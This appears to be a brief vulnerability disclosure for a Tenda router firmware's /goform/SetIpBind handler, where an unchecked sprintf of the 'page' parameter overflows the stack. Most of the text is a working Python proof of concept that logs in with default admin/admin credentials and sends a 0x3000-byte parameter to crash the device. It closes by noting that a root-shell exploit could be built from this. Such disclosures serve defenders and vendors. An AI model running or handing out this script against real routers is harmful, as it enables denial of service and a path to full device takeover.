-
Manufacturer's address:https://www.tenda.com.cn/
-
Firmware download address : https://www.tenda.com.cn/download/detail-2218.html
In /goform/SetIpBind, the page will be spliced into s by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.
import requests
cmd = b'page=' + b'a' * 0x3000
url = b"http://192.168.10.103/login/Auth"
payload = b"http://192.168.10.103/goform/SetIpBind/?" + cmd
data = {
"username": "admin",
"password": "admin",
}
def attack():
s = requests.session()
resp = s.post(url=url, data=data)
print(resp.content)
resp = s.post(url=payload, data=data)
print(resp.content)
attack()
You can see that the router crashed, and finally you can write an exp to get a root shell